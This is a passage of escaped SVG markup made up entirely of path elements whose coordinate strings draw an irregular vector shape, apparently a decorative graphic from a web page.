d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path 